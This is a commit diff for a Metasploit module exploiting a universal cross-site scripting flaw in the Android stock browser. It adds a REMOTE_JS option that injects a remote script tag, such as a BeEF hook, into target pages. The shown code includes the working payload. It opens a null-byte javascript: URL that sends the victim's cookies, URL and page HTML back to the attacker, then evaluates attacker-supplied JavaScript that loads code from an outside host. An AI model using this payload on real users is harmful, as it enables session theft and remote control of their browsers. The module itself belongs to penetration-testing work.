Land rapid7#3801, REMOTE_JS for Android UXSS

For BeEF integration, etc.

Author: wvu

modules/auxiliary/gather/android_stock_browser_uxss.rb

@@ -57,6 +57,11 @@ module also allows running aribrary javascript in the context of the targeted UR
         "A string of javascript to execute in the context of the target URLs.",
         ''
       ]),
+      OptString.new('REMOTE_JS', [
+        false,
+        "A URL to inject into a script tag in the context of the target URLs.",
+        ''
+      ]),
       OptBool.new('BYPASS_XFO', [
         false,
         "Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
@@ -123,7 +128,7 @@ def on_request_uri(cli, request)
           var exploit = function(){
             window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
               'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
-              'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(datastore['CUSTOM_JS'])}"'+
+              'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
               '));}void(0);', n);
           }
           if (!n) {
@@ -215,6 +220,19 @@ def backend_url
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end
 
+  def custom_js
+    rjs_hook + datastore['CUSTOM_JS']
+  end
+
+  def rjs_hook
+    remote_js = datastore['REMOTE_JS']
+    if remote_js.present?
+      "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
+    else
+      ''
+    end
+  end
+
   def run
     exploit
   end